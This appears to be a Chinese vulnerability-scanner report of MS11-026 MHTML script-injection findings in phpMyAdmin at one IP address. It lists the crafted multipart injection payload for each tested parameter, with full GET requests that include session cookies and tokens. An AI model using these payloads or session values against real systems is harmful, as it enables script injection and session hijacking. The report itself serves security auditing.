Microsoft Windows MHTML脚本代码注入漏洞(MS11-026)
URL http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu
请求方式 GET
问题参数 table
判断标准 1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu&table=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2、设置参数 table----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
请求&响应 GET /phpmyadmin/index.php?lang=zh_CN&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu&table=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN
  • Referer: http://202.201.39.48/phpmyadmin/index.php

URL http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu
请求方式 GET
问题参数 db
判断标准 1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2、设置参数 db----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
请求&响应 GET /phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN
  • Referer: http://202.201.39.48/phpmyadmin/index.php

URL http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace
请求方式 GET
问题参数 url
判断标准 1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/phpmyadmin/url.php?lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2、设置参数 url----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
请求&响应 GET /phpmyadmin/url.php?lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN
  • Referer: http://202.201.39.48/phpmyadmin/index.php

URL http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&token=7f6f76c93661b81b29cd7457ecae1b45
请求方式 GET
问题参数 url
判断标准 1、修改指定参数值为触发mhtml漏洞的特殊字符串,发送请求;
2、如果浏览器能够执行注入代码,则认为存在该漏洞。
判断详情 1、构造URL: http://202.201.39.48/phpmyadmin/url.php?token=7f6f76c93661b81b29cd7457ecae1b45&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2、设置参数 url----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3、在响应头及响应内容中匹配: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
请求&响应 GET /phpmyadmin/url.php?token=7f6f76c93661b81b29cd7457ecae1b45&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN;pmaAuth-1=deleted
  • Referer: http://202.201.39.48/phpmyadmin/index.php